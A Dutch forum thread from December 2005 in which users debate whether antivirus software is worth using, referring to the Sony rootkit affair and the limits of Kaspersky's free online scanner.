Je kan nog zoveel beveiling op je pc hebben: Virusscanners, firewalls, anti-spyware. In dit geval had het allemaal geen donder uitgemaakt.

Oh, niet? Doe voor de verandering eens wat research and be amazed.

jep schreef op zaterdag 17 december 2005 @ 14:53:
En ik heb geen virus Ik scan wel eens online, maar je moet gewoon weten wat je doet.

online scanner vs. weten wat je doet. Sure thing.

Ach, zodra je een source kan aanpassen en compilen, FSG kan gebruiken en weet wat NTFS rechten zijn heb je hier geen AV scanner meer nodig lijkt het wel.

zaterdag 17 december 2005 15:15

Acties:

0 Henk 'm!

Verwijderd

trouwens leuk dat zowel Jotti als Schouw naar het sony rootkit incident verwijzen. want het echte schandaal is het volgende : dat geen enkele van de vetbetaalde beveiligingsfirma's in de periode van ongeveer midden 2004 (rootkit cd's in omloop) tot einde 2005 deze malware detecteerden. was dat "gewoon" incompetentie of was het moedwillig? in hun mammoniaans streven [van de beveilgingsfirma's] wordt alle ethiek opzij geschoven en het handelen in de interesse van de gebruiker achterwege gelaten.

[ Voor 10% gewijzigd door Verwijderd op 17-12-2005 18:35 ]

zaterdag 17 december 2005 15:35

Acties:

0 Henk 'm!

Jimbolino

troep.com

Verwijderd schreef op zaterdag 17 december 2005 @ 15:14:
[...]
Oh, niet? Doe voor de verandering eens wat research and be amazed.

dit bedoelde ik:

Verwijderd schreef op zaterdag 17 december 2005 @ 15:15:
trouwens leuk dat zowel Jotti als Schouw naar het sony rootkit incident verwijzen. want het echte schandaal is het volgende : dat geen enkele van de vetbetaalde beveiligingsfirma's in de periode van ongeveer midden 2004 (rootkit cd's in omloop) tot einde 2005 deze malware niet detecteerden. was dat "gewoon" incompetentie of was het moedwillig? in hun mammoniaans streven [van de beveilgingsfirma's] wordt alle ethiek opzij geschoven en het handelen in de interesse van de gebruiker achterwege gelaten.

Verwijderd schreef op zaterdag 17 december 2005 @ 15:14:
online scanner vs. weten wat je doet. Sure thing.

Je gaat me niet vertellen dat de kaspersky online virusscanner, speciale, mindere, definities gebruikt dan de "offline" versie.

The two basic principles of Windows system administration:
For minor problems, reboot
For major problems, reinstall

zaterdag 17 december 2005 15:48

Acties:

0 Henk 'm!

Miki

Jimbolino schreef op zaterdag 17 december 2005 @ 15:35:
[...]
Je gaat me niet vertellen dat de kaspersky online virusscanner, speciale, mindere, definities gebruikt dan de "offline" versie.

Helaas wel: The free Kaspersky On-line Scanner does not scan RAM, boot sectors and MBRs, so it cannot detect malicious code located in these areas.

Ik heb zelf Kaspersky online virusscanner nooit getest, maar ik vermoed dat deze de gewone definities gebruikt en niet de uitgebreide definities die wel gekozen kunnen worden in hun offline producten. Met de uitgebreide definities kan veel meer malware worden gevonden. Als je de uitgebreide definities gebruikt worden er ook niet virus programma's gevonden die wel een bedreiging kunnen vormen zoals IRC programma's. Dus ik ben er wel bijna zeker van dat voor de online functie kaspersky voor de veilige weg heeft gekozen en dus niet helemaal gelijk is aan de offline scanner.

[ Voor 27% gewijzigd door Miki op 17-12-2005 15:54 ]

zaterdag 17 december 2005 16:02

Acties:

0 Henk 'm!

Verwijderd

Jimbolino schreef op zaterdag 17 december 2005 @ 15:35:
[...]

Je gaat me niet vertellen dat de kaspersky online virusscanner, speciale, mindere, definities gebruikt dan de "offline" versie.

Waar noem ik de KL online scanner?

Het feit dat je deze vraag moet stellen zegt meer dan genoeg over je kunde.
Als je met de grote jongens wil discussiëren zorg dan dat je kennis on par is, dit heeft geen nut zo.

zaterdag 17 december 2005 16:02

Acties:

0 Henk 'm!

Ruzor

Off with his head man

Verwijderd schreef op vrijdag 16 december 2005 @ 23:43:
Goed, eentje dan.

Als een grootheid als Russinovich 'ongewenste software' op zijn pc kan krijgen, hoe arrogant kun je dan zijn om te denken dat dat jou, als niet AV gebruikend persoon, welke in de verste verte niet aan de expertise van Russinovich kan tippen, dat niet kan gebeuren?

Dat zeg ik hier Ruzor in "Wel of niet een virusscanner gebruiken?" in zeker mate dus ook. Tweede deel dan

[ Voor 6% gewijzigd door Ruzor op 17-12-2005 16:03 ]

[This is what you get when you mess with us]

Pagina: Vorige 1 ... 4 ... 8 Volgende Laatste

Reageer